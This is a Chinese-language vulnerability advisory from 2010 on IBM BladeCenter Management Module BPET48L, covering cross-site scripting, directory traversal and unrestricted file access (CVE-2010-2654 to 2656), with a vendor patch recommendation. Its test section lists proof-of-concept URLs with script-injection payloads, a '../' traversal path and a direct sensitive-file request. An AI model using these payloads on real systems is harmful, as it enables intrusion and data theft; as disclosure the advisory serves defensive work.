发布日期：2010-07-06
更新日期：2010-07-06

受影响系统：

IBM BladeCenter Managmet Module BPET48L

不受影响系统：

IBM BladeCenter Managmet Module 5.0
IBM BladeCenter Managmet Module 4.7

描述：

---

BUGTRAQ  ID: 41383
CVE(CAN) ID: CVE-2010-2654,CVE-2010-2655,CVE-2010-2656

BladeCenter管理模块是可热插拔到BladeCenter机箱管理槽的硬件设备。

BladeCenter管理模块没有正确地过滤用户提交给多个页面的URI请求参数，远程攻击者可以通过提交恶意参数请求执行跨站脚本或目录遍历攻击；此外由于没有限制对文件的访问，攻击者可以通过直接请求文件访问敏感数据。

<*来源：Alexey Sintsov （don_huan@xakep.ru）
  
  链接：http://www.exploit-db.com/exploits/14237/
        http://secunia.com/advisories/40445/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://[BLADECENTER]/private/cindefn.php?INDEX=3%3C/NOBR%3E%20%3Cscript%3Ealert(\'XSS1\');%3C/script%3E&VLANID=&IPADDR=3>%3Cscript%3Ealert(\'XSS2\');%3C/script%3E  
http://[BLADECENTER]/private/power_management_policy_options.php?domain=3<XSS>  
http://[BLADECENTER]/private/pm_temp.php?view=6&mod_type=3&slot=3<XSS>  
http://[BLADECENTER]/private/power_module.php?view=4&mod_type=4&slot=3<XSS>  
http://[BLADECENTER]/private/pm_temp.php?view=6&mod_type=3&slot=3<XSS>  
http://[BLADECENTER]/private/blade_leds.php?WEBINDEX=3<XSS>  
http://[BLADECENTER]/private/ipmi_bladestatus.php?SLOT=3<XSS>&save=1  
http://[BLADECENTER]/private/file_management.php?DIR=/../../../tmp/etc
http://[BLADECENTER]/private/sdc.tgz

建议：

---

厂商补丁：

IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.ers.ibm.com/

浏览次数：1862
严重程度：0（网友投票）